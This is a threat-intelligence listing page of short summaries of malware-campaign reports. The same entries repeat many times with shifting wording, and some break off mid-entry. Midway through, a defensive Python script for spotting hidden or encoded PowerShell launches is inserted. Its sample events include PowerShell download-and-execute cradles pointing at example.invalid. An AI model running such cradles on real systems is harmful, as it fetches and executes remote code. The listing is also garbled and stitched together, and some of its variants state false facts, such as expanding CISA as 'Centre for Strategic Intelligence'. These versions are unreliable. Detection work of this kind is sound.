This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
An advanced adversary exploited a zero-day vulnerability in Ivanti Cloud Services Appliance (CSA) to gain access to a victim's network, according to research by FortiGuard Labs and the US Cybersecurity and Infrastructure Security Agency (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A HarfangLab report, published on 11 October 2024, analyses how HijackLoader abuses genuine code-signing certificates to deploy Lumma Stealer and maps the observed tactics to MITRE ATT&CK.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and a Tor onion service for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRAT and RedLine Stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware Masquerading as Oculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
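The two paste-and-run entries above, like the encoded-command loaders described under FHAPPI and the fake-CAPTCHA Lumma chain, all end in the same observable: a powershell.exe launched from the Run dialog or a script host with a hidden window and a Base64-encoded or download-cradle command line. The following Python triage script is an added example, not code from any of the listed reports. It decodes -EncodedCommand arguments (Base64 of a UTF-16LE string), scores a small heuristic indicator set over the command line and the decoded payload, and adds weight to the explorer.exe-parent plus hidden/encoded pairing that paste lures produce. The sample log lines, the indicator list, the score threshold and the example.invalid URLs are all constructed for illustration.

```python
"""Triage PowerShell process-creation events for encoded-command and
download-cradle patterns. Added example; all sample log lines are constructed."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -en, -enc, ...); the value is Base64 of a UTF-16LE string.
_ENC = re.compile(r"(?<![\w-])-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Heuristic indicators (an assumption for this example), scanned over the
# command line *and* the decoded payload.
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-nop(?:rofile)?\b",
    "policy_bypass": r"-e(?:p|x[a-z]*)\s+bypass",
    "invoke_expression": r"\b(?:iex|invoke-expression)\b",
    "web_download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer",
    "base64_inline": r"frombase64string",
}
SUSPICIOUS_SCORE = 3  # threshold chosen for this example


def encode_ps(command: str) -> str:
    """Produce the -EncodedCommand form of a script block (what the lures paste)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmdline: str) -> tuple[Optional[str], str]:
    """Return (decoded payload or None, command line with the Base64 blob blanked).
    The blob is blanked so Base64 text cannot spuriously match an indicator."""
    m = _ENC.search(cmdline)
    if not m:
        return None, cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = None
    return decoded, cmdline[: m.start(1)] + "<blob>" + cmdline[m.end(1):]


@dataclass
class Finding:
    image: str
    parent: str
    decoded: Optional[str]
    indicators: list[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)

    @property
    def verdict(self) -> str:
        return "suspicious" if self.score >= SUSPICIOUS_SCORE else "low"


def analyze_event(line: str) -> Optional[Finding]:
    """Parse one Sysmon-style key=value event; return a Finding for PowerShell only."""
    ev = {k: v.strip('"') for k, v in _KV.findall(line)}
    image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
    cmdline = ev.get("CommandLine", "")
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    decoded, scrubbed = extract_encoded(cmdline)
    f = Finding(image=image, parent=parent, decoded=decoded)
    if scrubbed != cmdline:
        f.indicators.append("encoded_command")
    text = scrubbed + " " + (decoded or "")
    for name, pattern in INDICATORS.items():
        if re.search(pattern, text, re.I):
            f.indicators.append(name)
    # Paste-into-Win+R lures leave explorer.exe as the parent of a hidden or
    # encoded PowerShell; that pairing is the strongest single signal here.
    if parent.lower().endswith("explorer.exe") and (
        {"hidden_window", "encoded_command"} & set(f.indicators)
    ):
        f.indicators.append("run_dialog_paste")
    return f


def analyze_events(lines: list[str]) -> list[Finding]:
    return [f for f in map(analyze_event, lines) if f is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _event(parent: str, image: str, cmdline: str) -> str:
    return f'ParentImage={parent} Image={image} CommandLine="{cmdline}"'


# Constructed sample events (Sysmon Event ID 1 style), not taken from any report.
SAMPLE_EVENTS = [
    # paste-into-Run lure: explorer.exe parent, hidden window, encoded download cradle
    _event(r"C:\Windows\explorer.exe", PS,
           "powershell.exe -w hidden -nop -ep bypass -enc "
           + encode_ps("iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')")),
    # ordinary interactive administration
    _event(r"C:\Windows\System32\cmd.exe", PS, "powershell.exe -NoProfile -Command Get-Service"),
    # encoded but harmless: management agents use -EncodedCommand routinely
    _event(r"C:\Windows\System32\svchost.exe", PS,
           "powershell.exe -EncodedCommand " + encode_ps("Get-Date")),
    # not PowerShell at all
    _event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
    # LNK-style chain: cmd.exe parent, plaintext cradle piped into iex
    _event(r"C:\Windows\System32\cmd.exe", PS,
           "powershell.exe -ep bypass -w hidden -c iwr http://example.invalid/p.txt -UseBasicParsing | iex"),
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"{f.verdict:10} score={f.score} parent={f.parent} indicators={f.indicators}")
        if f.decoded:
            print("           decoded:", f.decoded)
```

The Base64 blob is blanked before scanning because Base64 text can by chance contain substrings such as iex. An encoded command on its own is not evidence: endpoint-management agents and scheduled tasks use -EncodedCommand routinely, which is why the svchost.exe sample scores low, and a user who opens PowerShell from the Start menu also gets explorer.exe as the parent; it is the pairing with a hidden window or an encoded download cradle that matters. To run it on real data, feed it Sysmon Event ID 1 or Security 4688 events (with command-line auditing enabled) after adapting the key=value parsing to your log shape.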
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
Sekoia researchers observed a Mallox ransomware affiliate exploiting exposed MS-SQL servers and using the PureCrypter loader to deliver the ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actor TA571 and the ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ransomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to those of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware, and victims were directed to a fraudulent website mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
